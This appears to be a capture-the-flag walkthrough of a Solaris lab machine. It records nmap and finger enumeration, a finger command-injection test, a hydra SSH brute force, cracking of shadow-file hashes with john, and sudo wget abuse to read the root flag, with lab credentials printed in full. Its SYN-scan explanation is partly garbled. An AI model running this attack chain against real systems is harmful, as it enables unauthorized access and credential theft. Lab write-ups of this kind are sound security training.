# Enumeration Stage
### NMAP
There is a firewall that is filtering our requests. To bypass it I have ran the script with the -sS and -A tags.
1. sS (TCP SYN scan)
SYN scan is the default and most popular scan option for good reasons. It can be performed quickly,
also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works
connection. You send a SYN packet, as if you are going to open a real connection and then wait for a
response. A SYN/ACK indicates the port is listening (open), while a RST (reset) is indicative of a
is received. The port is also considered open if a SYN packet (without the ACK flag) is received in
TCP connect scan is the default TCP scan type when SYN scan is not an option.
The service scan reveals five open ports.
# nmap -p- 10.10.10.76 -sV -sC -T4
PORT STATE SERVICE VERSION
79/tcp open finger Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
44060/tcp open unknown
44273/tcp open rpcbind
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
### Port 79/tcp finger
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.
[This website(hacktricks.xyz)](https://book.hacktricks.xyz/pentesting/pentesting-finger) reveals **really** cool information on the service and ways to exploit it.
# finger [email protected] 130 ⨯
Login Name TTY Idle When Where
xvm xVM User < . . . . >
openldap OpenLDAP User < . . . . >
nobody NFS Anonymous Access < . . . . >
noaccess No Access User < . . . . >
nobody4 SunOS 4.x NFS Anonym < . . . . >
###### metasploit finger user enumeraion
We have already enumerated some users but it doesn't hurt to try the metasploit module too. From the output we understand that there is an mysql user too.
msf6 auxiliary(scanner/finger/finger_users) > run
msf6 auxiliary(scanner/finger/finger_users) > run
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: sunny
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: adm
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: lp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: uucp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: nuucp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: dladm
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: listen
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: bin
[+] 10.10.10.76:79 - 10.10.10.76:79 Users found: adm, bin, dladm, listen, lp, nuucp, sunny, uucp
[*] 10.10.10.76:79 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
###### Command injection test
# finger "/bin/ls -a /@10.10.10.76" 1 ⨯
Login Name TTY Idle When Where
/bin/ls ???
-a ???
/ ???
# finger "|[email protected]"
Login Name TTY Idle When Where
|ls ???
### Port 111/tcp portmapper
In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on ***Solaris*** hosts) to identify RPC services that are open to direct attack.
You can run ***nmap*** with the ***-sR*** option to identify RPC services listening on high ports if the portmapper is inaccessible.
### Bruteforcing ssh service
Found password "sunday".
# hydra -I -l sunny -P /home/kali/passwords.txt -t 16 -s 22022 ssh://10.10.10.76
[delete]
[DATA] attacking ssh://10.10.10.76:22022/
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday
1 of 1 target successfully completed, 1 valid password found
# Privilege Escalation
Logging through ssh using sunny:sunday as username:password.
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] -p 22022 1 ⚙
Password:
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$
Weird file
sunny@sunday:/tmp$ cat ogl_select253
SUNWtext mesa
NVDAnvda nvidia
Path poison attempt. Upon logging in, I tried sudo -l and I see that /root/troll does not require password to run. Upon running my guess is that it invokes a system call "id". Therefore I am creating a file /bin/bash with the name "id" and exporting the path to that file to be executed when invoked therefore root will run /bin/bash and I should privesc. Unfortunately, the attempt is unsuccessful.```bash
sunny@sunday:/usr/share$ sudo -l
User sunny may run the following commands on this host:
(root) NOPASSWD: /root/troll
sunny@sunday:/usr/share$ sudo /root/troll
testing
uid=0(root) gid=0(root)
sunny@sunday:/tmp/$ cp /bin/bash /tmp/id
sunny@sunday:/tmp/$ chmod 777 id
sunny@sunday:/tmp/$ echo $PATH
/usr/gnu/bin:/usr/bin:/usr/X11/bin:/usr/sbin:/sbin
sunny@sunday:/tmp/$ export PATH=/tmp:$PATH
sunny@sunday:/tmp/$ sudo /root/troll
testing
uid=0(root) gid=0(root)
I have discovered a backup shadow file containing sammy's pass hash.
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
By using john, i have managed to extract the passwd from the hash. username:password == sammy:cooldude!
# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:26 0.74% (ETA: 12:51:05) 0g/s 4771p/s 4771c/s 4771C/s dtown214..balls2
cooldude! (sammy)
1g 0:00:00:43 DONE (2021-05-17 11:53) 0.02300g/s 4687p/s 4687c/s 4687C/s domonique1..chrystelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Changing user to sammy. I once again tested the mandatory "sudo -l" command and received a ***NOPASSWD*** for ***/usr/bin/wget***. According to [GTFO binaries](https://gtfobins.github.io/gtfobins/wget/) we can escalate privileges by downloading our own file and saving it to our victim (such as shadow) or simply use wget to read out files.
sunny@sunday:/tmp$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
sunny@sunday:/tmp$ LFILE=/root/root.txt
sunny@sunday:/tmp$ sudo wget -i $LFILE
/root/root.txt: Invalid URL <fb40..ROOT FLAG>: Unsupported scheme
No URLs found in /root/root.txt.
sunny@sunday:/tmp$
0 Comments
Recommended Comments
Няма коментари